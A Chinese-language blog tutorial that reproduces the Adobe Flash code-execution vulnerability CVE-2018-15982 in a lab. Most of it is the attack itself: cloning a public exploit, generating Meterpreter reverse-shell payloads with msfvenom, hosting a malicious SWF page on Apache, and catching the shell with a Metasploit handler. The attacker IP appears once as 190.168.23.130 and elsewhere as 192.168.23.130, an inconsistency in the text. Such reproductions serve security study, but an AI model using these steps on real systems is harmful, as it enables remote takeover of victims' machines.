溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行任意代碼執行漏洞CVE-2018-15982復現

發布時間:2021-12-29 15:45:20 來源:億速云 閱讀:207 作者:柒染 欄目:網絡安全

這篇文章給大家介紹如何進行任意代碼執行漏洞CVE-2018-15982復現,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

漏洞描述:

2018年11月29日,某團隊在全球范圍內第一時間發現一起針對俄羅斯的APT攻擊行動,通過一份俄文內容的醫院員工問卷文檔,攜帶最新的Flash 0day漏洞和具有自毀功能的專屬木馬程序,該漏洞(CVE-2018-15982)允許攻擊者惡意制作的Flash對象在受害者的計算機上執行代碼,從而獲取對系統命令行的訪問權限。

受影響的版本:

AdobeFlash Player <= 31.0.0.153

AdobeFlash Player Installer<= 31.0.0.108

不受影響的版本:

AdobeFlash Player 32.0.0.101

AdobeFlash Player Installer 31.0.0.122

復現環境:

攻擊機:Linux kali (IP:190.168.23.130)

靶機:Windows 7 X64 (IP:192.168.23.133)

復現過程:

git clone漏洞poc

git clone https://github.com/Ridter/CVE-2018-15982_EXP

如何進行任意代碼執行漏洞CVE-2018-15982復現

創建payload程序

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 64.bin

如何進行任意代碼執行漏洞CVE-2018-15982復現

會生成兩個bin文件,分別為86bin和64bin

poc執行并開啟http

生成poc

cp *.bin CVE-2018-15982_EXP/

cd CVE-2018-15982_EXP/

python CVE_2018_15982.py -i 86.bin -I 64.bin

如何進行任意代碼執行漏洞CVE-2018-15982復現

開啟web服務

service apache2 start

cp index.html /var/www/html/

cp exploit.swf /var/www/html/

如何進行任意代碼執行漏洞CVE-2018-15982復現

msf監聽

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

set lport 4444

set lhost 192.168.23.130

set RC4PASSWORD zale

run

如何進行任意代碼執行漏洞CVE-2018-15982復現

通過靶機訪問http://192.168.23.130/index.html

如何進行任意代碼執行漏洞CVE-2018-15982復現

可以看到返回shell

如何進行任意代碼執行漏洞CVE-2018-15982復現

關于如何進行任意代碼執行漏洞CVE-2018-15982復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女